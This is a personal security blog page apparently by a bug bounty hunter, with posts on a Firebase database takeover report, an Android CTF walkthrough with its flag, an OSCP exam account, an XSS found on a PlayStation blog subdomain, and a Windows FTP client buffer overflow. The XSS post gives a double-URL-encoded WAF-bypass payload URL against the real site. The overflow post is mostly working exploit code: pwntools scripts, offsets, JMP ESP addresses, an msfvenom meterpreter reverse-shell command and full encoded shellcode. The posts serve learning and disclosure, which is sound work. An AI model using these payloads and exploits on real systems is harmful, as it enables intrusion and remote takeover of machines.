Menu

Blog

How I was able to find firebase database takeover vulnerability in a company

Introduction

This is my bug bounty write up about firebase database takeover vulnerability which I found in android app. There are just a few resources about android hacking. This article aims to briefly documents about one of the android vulnerability called firebase database takeover vulnerability. For this purpose I will share my finding about this vulnerability. I will blur some of the company information. Being said that , let’s get jump in.

Steps To Reproduce

1. Download application from google playstore.

2. Use apk extractor to extract apk.

3. I used bluestack emulator.

4. Use apktool to decompile the application.

5. Go to res/values/strings/xml

6.Look for firebase url

7.I wrote a python script to insert data

8.POC(Proof Of Concept)

Impact

This application doesn’t need any access _token to insert data to the firebase database. It is completely open and anybody can access it without any credentials.

Timeline

Vulnerability Reported – 15 October, 2020 3:37 AM.

Replied – 15 October, 2020 12:31 PM

Rewarded $100 for two reports – 21 October, 2020 11:21 AM.

Conclusion

I really appreciate the company for very fast reply when I was submitting the vulnerability and they replied me to disclose this vulnerability. I really enjoy finding bugs in their organization and thanks for agreeing to disclose this report and rewarding me a bounty.

References

https://medium.com/@danangtriatmaja/firebase-database-takover-b7929bbb62e1

Infosec Mobile CTF Challenge 1

Introduction

Hello , I am Chan. Today I want to write an article about android ctf challenge from Infosec Mobile CTF 2018. I know that there is a few resources about android pentesting while I was learning android pentest and so I want to make more articles about android pentest and want to share my knowledge to community.

Being said that , this article aims to briefly document some techniques and tools involved in the vulnerability assessment of android applications. For this purpose , we will solve the 1st challenge of Infosec mobile CTF and learn the mobile pentest through CTF Challenges. Please get the apk from here.

Initial Setup

I am going to use blue stack emulator to solve this challenge. So I already seted up the emulator and just going to click on the app and it will install automatically.

Challenge Description

App CTF Challenge 1: The goal behind this challenge is to figure out the username and password that would let the challenger login successfully. The flag should be “password:username”. (ends 4/6)

1. Decompile The Apk

I will use apktool to decompile the apk.

apktool d App1.apk

2. Launch the apk in emulator

3. Decompile the apk file to jar file to analyze the source code

I used dex2jar to decompile the apk to jar file

4. Get the following files

5. Use jd-gui to view the source codes of jar file

We can see that com.ctf.app1 is the package of the apk file and there is no interesting things on the Buildconfig.class

It is pretty obivious that this is md5 decrypt function.

As we saw the md5 function in above picture and now we can see that there is a md5 string. There is a function called OnClick.

What this function does is , it takes the username and password from user, combine them into one string and hash it using md5 and comparing the hash to 263c7fa932b26a56ec0ad76b94aff98b.

6. Getting the decrypted text for MD5 Hash

I used this website https://hashes.com/en/decrypt/hash to decrypt md5 hash.

7. Flag

As they mentioned in Challenge Description the flag is the username and password.

Username - admin
Password - [email protected]

8. POC(Proof Of Concept)

After submitting the username and password, we got the smile face:)

Conclusion

This is my first article about android pentest. If you would like to learn more about android pentest challenge, please keep reading in my blog. I will upload more about the android pentest challenges and solution. Also this is gonna be a series of learning android pentest through CTF challenges.

If you like this article, please share on your social media and share to your friends.

Keep learning.

Thank you!

Into the OSCP Journey

When people heard OSCP, they think the exam like a beast or a monster which will tear them apart. Yes, i did think like them in the past but with proper preparation, any beast or exam can be defeated. I took oscp exam on 27th August 2020 and passed on 31st August 2020. Today i will share you about my experience in the OSCP journey.

What is OSCP?

OSCP (called Offensive Security Certified Professional) is a well known certification in Cyber Security. It is famous for its 100% hands on exam which is really quite challenging. The exam duration is 24 hour(precisely 23 hour & 45 minute). In the exam, you have to do penetration testing on 5 boxes (means 5 computer servers),so the timing is also very important.If you want to know details about oscp, you can google it cuz i’m not going to explain in details.

Preparation

Before doing OSCP, i spent most of my time solving the netsecfocus OSCP like machines from vulnhub and hackthebox. I completed 85% of the machines. Then I decided to purchase the OSCP course on june 27 and got access to labs and materials on july 5. In 20 days, I solved 35 machines from oscp labs including the big 4 which are considered to be difficult but not much difficult as hackthebox hard machines :C . Then i worried about my windows privilege escalation skill and decided to purchase the Tib3rius’s windows privilege escalation course which is really good for beginners.I did that course and just went roughly through the tryhackme oscp learning path. Then i decided to schedule my exam date on 27th August and relax my mind for 5 days before the exam.

For netsecfocus OSCP like machines

https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=0

Tib3rius’s windows privilege escalation course

https://www.udemy.com/course/windows-privilege-escalation/

Tryhackme OSCP path

https://tryhackme.com/path/outline/OSCP

Exam Day

I scheduled my time at 7:30 am. A morning time is refreshing and is the best time to start. Due to my poor internet connection, i started at 7:50 am. The internet connection is very important for this exam. The exam is proctored. The proctorer checked the passport for identification and i had to show around the room, under the desk as they asked. I had to screenshare and allowed access protector to my webcam. So i recommend to check the screensharing and webcam before taking exam. As usual i did all the scanning on all boxes while doing bufferoverflow. Before starting exam, I started my windows 7 virutal box on my kali for preparation but it turned out to be very disadvantageous. My laptop was super slow and laggy. I was nervous bcuz of time late and the immunity dubugger was very laggy on my machine. Due to nervous,i made mistakes. I did the bufferoverflow patiently and after one and a half hours i got the flag. Then i saw my masscan did not get any output from one of the machines. I decided to scan it again and then my laptop got hanged. I had to restart my laptop in hurry and emailed the OSCP support about my problems. I reconnected to the exam panel and told about my problems. Then i resumed my exam but sadly i did not output any scan results. So, i decided to scan and did the boxes one after one. At sharp 1:30 pm, I had done 4 boxes and decided to get lunch. After lunch, i decided to do the reporting first because i’m bad at reporting and worried about my screenshots. After checking my report several times and i ended my exam. In the next morning, I submitted my report and got my exam result on 31st August. I passed the OSCP exam on my 1st attempt.

Tips on taking OSCP exam

  • Enumeration is the key [ Once you got access to OSCP student forum, i recommend to read the Alpha & Beta writeups ]
  • Taking screenshots as many as you can
  • Practise reporting
  • Practise boxes without writeups
  • Don’t get very nervous if something happens
  • Proper Preparation
  • Good Laptop, best internet and a good chair

Good Quotes

  • “Try Harder”
  • “Practice makes perfect”
  • “Every battle is won before it is fought”

Story of Playstation(Sony) XSS

Hello all!!! Today i decided to share my finding of xss on subdomain of playstation. It was 1 year ago i think, i started hunting bug on sony websites and first i found directory indexing on [ https://blog.latam.playstation.com/wp-content/ https://blog.latam.playstation.com/wp/wp-includes/ https://blog.us.playstation.com/wp/wp-includes/ https://blog.us.playstation.com/wp-content/ https://blog.br.playstation.com/wp/wp-includes/ https://blog.br.playstation.com/wp-content/ https://rd.playstation.com/ ]

Then i reported to sony and they didn’t accept because they could not find any impact.I didnt understand why they said that :3 and i was like okay.Then I tried to dig more into the folders and found this page [ https://blog.latam.playstation.com/wp-content/mu-plugins/fieldmanager/tests/js/index.html ]. I found Qunit 1.21.0 on the page and i decided to find exploit on google. Then i found this page.

There are two pocs and the 2nd poc shows that the parameter testId is vulnerable to xss.So i decided to give it a try.First i injected payload <svg onload=alert(1)> and waf filters it.Then i fuzzed a lot and at last boom! double url encoding bypass the waf.

So the POC link is [ https://blog.us.playstation.com/wp-content/mu-plugins/fieldmanager/tests/js/index.html?testId=%25%33%63%25%37%33%25%37%36%25%36%37%25%32%30%25%36%66%25%36%65%25%36%63%25%36%66%25%36%31%25%36%34%25%33%64%25%36%31%25%36%63%25%36%35%25%37%32%25%37%34%25%32%38%25%36%34%25%36%66%25%36%33%25%37%35%25%36%64%25%36%35%25%36%65%25%37%34%25%32%65%25%36%34%25%36%66%25%36%64%25%36%31%25%36%39%25%36%65%25%32%39%25%33%65 ].

Then i reported the bug and they replied back after 3 months and rewarded a swag that was never shipped to me :V .

Thats my story of xss on playstation. Hope you like it. Thanks!!!

Windows Buffer Overflow (32bit ftp)

Today I will show how to exploit the 32bit windows buffer overflow .This is my first post of writing blog post.

What is buffer mean?

Buffers are areas of memory set aside to hold data, often while moving it from one section of a program to another, or between programs

Buffer Overflow?

A buffer overflow occurs when a program or process attempts to write more data to a fixed length block of memory, or buffer, than the buffer is allocated to hold. Since buffers are created to contain a defined amount of data, the extra data can overwrite data values in memory addresses adjacent to the destination buffer unless the program includes sufficient bounds checking to flag or discard data when too much is sent to a memory buffer.

Introduction

There is alot of tutorials about this 32bit ftp windows buffer overflow But I want to use the modern technique while the exploit the windows buffer overflow.Let’s start.

Requirements

  • U can download the 32bit ftp exe file here
  • U can test any windows version.
  • Immunity Debugger
  • Pwntools

First u need to load the 32bit ftp in immunity debugger.

File > open > select the ftp file and open.

When i try run via debugger ,its ask me ftp server ip and port.So we need create the ftp server and let that client ftp connect to us.Let create the simple ftp server using pwntools.

from pwn import *

l = listen(21)

payload ="Sent some strings"

_ = l.wait_for_connection()

l.sendline("220 " + payload)

sudo python test.py

Important ; Once u run the debgger ,every time u need to restart the debugger by pressing ctr+f2 or Debug tab > restart.

Next step . let crash the client ftp with a bunch of “A”

from pwn import *
l = listen(21)

payload ="A"*1000

_ = l.wait_for_connection()

l.sendline("220"+payload)

Great!. It crash . When we focus the EIP in debugger the Stack fill with alot of “A” .(EIP 41414141)

All of the registers have been overwritten by 41 (hex for A). This means that we have a buffer overflow vulnerability on our hands and we have proven that we can overwrite the EIP. At this point, we know that the EIP is located somewhere between 1 and 1000 bytes, but we are not sure where it’s located exactly. What we need to do next is figure out exactly where the EIP is located (in bytes) and attempt to control it.

Next step is to find offset .Let’s find .

from pwn import *

l = listen(21)

payload =cyclic(1000)

_ = l.wait_for_connection()

l.sendline("220 " + payload)

Select the EIP address (786A6161) and find with cyclic_find()

Offset = 989

To execute shellcode, we need to find a JMP/CALL ESP memory address, so EIP will read it and jump to the memory address stored in ESP. When you loaded the FTP client program in Immunity, you saw the kernel32.dll module was also loaded.So we jump that address let the shellcode run.

!mona jmp -r esp -m kernel

U will see 3 jmp esp addresses and 2 call esp addresses .U can use one of them .All addresses is worked.So, let jump this addresses with shellcode.Firstly I will execute the calculator .After this i will show how to generate reverse shell and exploit this.Let’s Pop calculator.

To generate the calc using msfvenom

msfvenom -a x86 –platform windows -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c -b “\x00”

Note: This ftp doesn’t contains any bad characters .So I will not show u how find bad characters in easy way and how avoid them.But I will write in another post .

Ths goal is Buffer + jmp esp + NOP + shellcode .

Why NOP contains in this exploit?

Some attacks consist of making the program jump to a specific address and continue running from there. The injected code has to be loaded previously somehow in that exact location.

Stack randomization and other runtime differences may make the address where the program will jump impossible to predict, so the attacker places a NOP sled in a big range of memory. If the program jumps to anywhere into the sled, it will run all the remaining NOPs, doing nothing, and then will run the payload code, just next to the sled.

The reason the attacker uses the NOP sled is to make the target address bigger: the code can jump anywhere in the sled, instead of exactly at the beginning of the injected code.

A 128-byte NOP sled is just a group of NOP intructions 128 bytes wide.

NOTE #1: NOP (No-OPeration) is an instruction available in most (all?) architectures that does nothing, other than occupying memory and some runtime.

NOTE #2: in architectures with variable length instructions, a NOP instruction is usually just one byte in length, so it can be used as a convenient instruction padding. Unfortunately, that also makes it easy to do a NOP sled.

Ref : https://stackoverflow.com/questions/14760587/how-does-a-nop-sled-work

Let’s go.

from pwn import *

payload ="\x41"*989

#jmp esp address

payload +=p32(0x765A3132)
payload += "\x90" * 30
payload += (

"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61"
"\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"
)
l = listen(21)
_ = l.wait_for_connection()

l.sendline("220 " + payload)

Ogay. cacl.exe pop up successfully .now I will generate the reverse shellcode using msfvenom.Coz i wanna control this machine ,popping calc isn’t enough for me :D….

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.9.255.232 LPORT=4444 -a x86 –platform win -e x86/alpha_mixed -f c -b ‘\x00’

Put the result in python script and run .

from pwn import *
payload ="\x41"*989
#jmp esp address
payload +=p32(0x771F3132)
payload += "\x90"*30
payload += (
"\x89\xe6\xd9\xea\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x59\x6c\x6a\x48\x4b\x32\x75\x50\x43\x30\x73\x30\x65\x30\x6c"
"\x49\x6a\x45\x54\x71\x79\x50\x62\x44\x4c\x4b\x66\x30\x70\x30"
"\x4e\x6b\x53\x62\x44\x4c\x4c\x4b\x31\x42\x54\x54\x4c\x4b\x63"
"\x42\x44\x68\x46\x6f\x4c\x77\x53\x7a\x55\x76\x44\x71\x59\x6f"
"\x4c\x6c\x65\x6c\x30\x61\x33\x4c\x46\x62\x46\x4c\x35\x70\x4a"
"\x61\x5a\x6f\x56\x6d\x43\x31\x4a\x67\x58\x62\x49\x62\x61\x42"
"\x30\x57\x6e\x6b\x62\x72\x42\x30\x6c\x4b\x30\x4a\x67\x4c\x6c"
"\x4b\x62\x6c\x66\x71\x30\x78\x49\x73\x57\x38\x46\x61\x5a\x71"
"\x72\x71\x6c\x4b\x61\x49\x71\x30\x37\x71\x6b\x63\x6c\x4b\x37"
"\x39\x57\x68\x79\x73\x45\x6a\x30\x49\x4c\x4b\x64\x74\x4e\x6b"
"\x67\x71\x79\x46\x30\x31\x39\x6f\x6e\x4c\x69\x51\x5a\x6f\x76"
"\x6d\x36\x61\x6b\x77\x67\x48\x59\x70\x73\x45\x38\x76\x54\x43"
"\x63\x4d\x7a\x58\x45\x6b\x51\x6d\x44\x64\x73\x45\x6d\x34\x46"
"\x38\x6e\x6b\x50\x58\x64\x64\x76\x61\x69\x43\x35\x36\x4e\x6b"
"\x44\x4c\x62\x6b\x6e\x6b\x52\x78\x75\x4c\x43\x31\x4a\x73\x4c"
"\x4b\x47\x74\x6e\x6b\x77\x71\x4e\x30\x4b\x39\x31\x54\x65\x74"
"\x55\x74\x43\x6b\x43\x6b\x35\x31\x51\x49\x63\x6a\x50\x51\x4b"
"\x4f\x4b\x50\x71\x4f\x51\x4f\x50\x5a\x6c\x4b\x62\x32\x5a\x4b"
"\x4e\x6d\x63\x6d\x72\x48\x56\x53\x55\x62\x73\x30\x53\x30\x35"
"\x38\x34\x37\x70\x73\x67\x42\x63\x6f\x51\x44\x42\x48\x50\x4c"
"\x44\x37\x54\x66\x35\x57\x6e\x69\x58\x68\x69\x6f\x68\x50\x6c"
"\x78\x6c\x50\x46\x61\x33\x30\x53\x30\x46\x49\x69\x54\x46\x34"
"\x36\x30\x75\x38\x46\x49\x6f\x70\x70\x6b\x35\x50\x4b\x4f\x4b"
"\x65\x43\x5a\x46\x6a\x32\x48\x46\x6a\x76\x69\x69\x6f\x58\x68"
"\x45\x38\x37\x72\x57\x70\x44\x51\x63\x6c\x6e\x69\x49\x76\x66"
"\x30\x72\x70\x42\x70\x56\x30\x37\x30\x56\x30\x57\x30\x32\x70"
"\x51\x78\x68\x6a\x64\x4f\x69\x4f\x79\x70\x49\x6f\x49\x45\x7a"
"\x37\x72\x4a\x32\x30\x50\x56\x31\x47\x62\x48\x7a\x39\x6d\x75"
"\x53\x44\x33\x51\x69\x6f\x79\x45\x4b\x35\x4f\x30\x62\x54\x57"
"\x7a\x6b\x4f\x62\x6e\x43\x38\x71\x65\x7a\x4c\x69\x78\x63\x57"
"\x65\x50\x65\x50\x33\x30\x43\x5a\x63\x30\x63\x5a\x34\x44\x53"
"\x66\x30\x57\x42\x48\x44\x42\x5a\x79\x6b\x78\x31\x4f\x49\x6f"
"\x7a\x75\x6e\x63\x79\x68\x63\x30\x53\x4e\x76\x56\x4c\x4b\x55"
"\x66\x63\x5a\x47\x30\x65\x38\x63\x30\x34\x50\x55\x50\x35\x50"
"\x61\x46\x63\x5a\x73\x30\x33\x58\x53\x68\x6f\x54\x51\x43\x5a"
"\x45\x39\x6f\x7a\x75\x4d\x43\x72\x73\x71\x7a\x63\x30\x31\x46"
"\x43\x63\x71\x47\x52\x48\x63\x32\x79\x49\x39\x58\x43\x6f\x69"
"\x6f\x6b\x65\x4c\x43\x6b\x48\x35\x50\x33\x4d\x65\x78\x52\x78"
"\x35\x38\x55\x50\x63\x70\x35\x50\x47\x70\x50\x6a\x77\x70\x70"
"\x50\x43\x58\x56\x6b\x36\x4f\x56\x6f\x76\x50\x79\x6f\x49\x45"
"\x36\x37\x32\x48\x34\x35\x72\x4e\x42\x6d\x73\x51\x39\x6f\x6a"
"\x75\x31\x4e\x33\x6e\x69\x6f\x66\x6c\x66\x44\x44\x4f\x4e\x65"
"\x42\x50\x39\x6f\x49\x6f\x69\x6f\x59\x79\x6f\x6b\x6b\x4f\x39"
"\x6f\x59\x6f\x56\x61\x6a\x63\x76\x49\x49\x56\x64\x35\x59\x51"
"\x69\x53\x6f\x4b\x78\x70\x6c\x75\x6c\x62\x70\x56\x63\x5a\x63"
"\x30\x61\x43\x49\x6f\x5a\x75\x41\x41"
)
l = listen(21)
_ = l.wait_for_connection()
l.sendline("220 " + payload)

Wait for connection in another terminal .

Gotcha..!!!

Let Break !

Exploit development is the long way journey .It’s endless, We just need to run. 😀 😀

If u face any trouble during testing .Just ping me.

./ht00lay

Scroll to top